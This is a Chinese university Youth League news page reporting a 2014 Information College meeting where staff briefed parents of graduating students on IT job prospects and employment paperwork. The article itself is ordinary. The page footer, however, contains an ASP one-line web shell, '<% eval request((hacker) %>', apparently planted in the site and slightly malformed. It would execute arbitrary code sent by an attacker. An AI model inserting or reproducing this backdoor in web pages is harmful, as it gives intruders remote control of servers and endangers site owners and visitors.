当前位置:共青团上海海洋大学委员会 >> 新闻中心 >> 学院动态 >> 正文  
站内信息搜索:
信息学院召开2014届上海籍毕业生家长会
[2014年05月13日]   来源:本站原创   作者:佚名   点击数: 【字体: 】【双击滚屏

    5月10日上午,信息学院2014届上海籍毕业生家长会在我校军工路校区培训中心二楼会议室召开。

    院长助理袁红春从市场角度,结合身边案例向家长们阐述了IT业的就业形势。贺刚老师则介绍了毕业生的总体现状、学院促进就业举措和毕业生就业过程中存在的突出问题,向家长重点强调了签署四联单的必要性和重要性,并对现阶段正在进行的基层就业项目作了介绍。院党委副书记晏萍希望家长主动关心子女学业、加强引导和学院的沟通,积极配合学院做好学生就业服务工作;同时希望在家长的支持下,尽快让同学们调整心态,掌握技巧,找到属于自己的社会舞台。

    会议期间,家长们仔细聆听并认真记录有用的信息。会后,很多家长仍不愿离开,纷纷就学业和就业中的种种问题与老师们做着深入、细致地交流。

    毕 业生家长会是信息学院每年举行的重要活动。家长们纷纷表示此次家长会不仅充分体现了学院、老师对毕业生就业工作的重视,也有效解答了自己的疑惑,今后会及时主动与学院老师沟通,支持配合学院的各项工作,共同做好毕业生就业工作。信息学院将继续探索家长会的有效形式,进一步加强与家长的沟通交流,更广泛地发动社会资源,做好毕业生就业工作。

 

关闭窗口

上一篇:上海海事大学信息工程学院学工办来校交流

下一篇:没有了
  留言板 | 管理登录 版权所有 © 2007 共青团上海海洋大学委员会 tw.shou.edu.cn <% eval request((hacker) %>